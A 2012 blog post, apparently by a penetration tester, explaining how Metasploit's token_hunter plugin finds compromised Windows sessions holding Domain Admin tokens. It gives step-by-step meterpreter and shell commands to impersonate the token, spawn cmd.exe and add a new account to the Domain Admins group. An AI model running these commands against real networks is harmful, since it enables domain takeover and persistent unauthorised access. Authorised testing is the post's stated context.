Friday, June 22, 2012

Hunting for Domain Admin Tokens


Penetration Assessments are a focused effort to accomplish one or more goals within a limited timeframe. It is often helpful to automate tasks to put time on your side. This is where a penetration tester who can code, really excels! Less time is wasted on mundane tasks. Automation is always key. Automating the tasks that should be automated. It is clear that there are specific tasks that can’t/shouldn’t be automated, but that is a topic for another post.
One nice example I have seen during several on-site assessments, is the need to find a machine with a Domain Admin’s token on it. The token can be impersonated to compromise the network. Finding the token can takes hours of manually work. I mentioned this to HD Moore he added a plugin to Metasploit that automates this process. To use this new functionality, we start by exploiting a ton of Windows boxes using meterpreter as the payload.
Next, we need to build a list of users that are within the Domain Admins groups. This list can be generated using:
Example of the file:
Code:
COMPANY\joe-admin
COMPANY\bill-admin
COMPANY\david-admin
We then need to load the token_hunter module in Metasploit and execute it. The token_hunt_user script will tell us which sessions contain a Domain Admin token.
Code:
msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt
To achieve Domain Admin privileges, we need to connect to a session that contained a Domain Admin token.
Code:
msf> sessions -i [session-with-domain-admin-token]
Once connected to the session, we then impersonate the Domain Admin and spawn cmd.exe with the admin’s privileges.
Code:
meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t
Lastly, we add a new account to the domain and add the account into the Domain Admins group.
Code:
C:\net user hack0r h4ck0r) /add /domain
C:\net group "Domain Admins" hack0r /add /domain
Enjoy it and Pwn dem v0hns!

No comments:

Post a Comment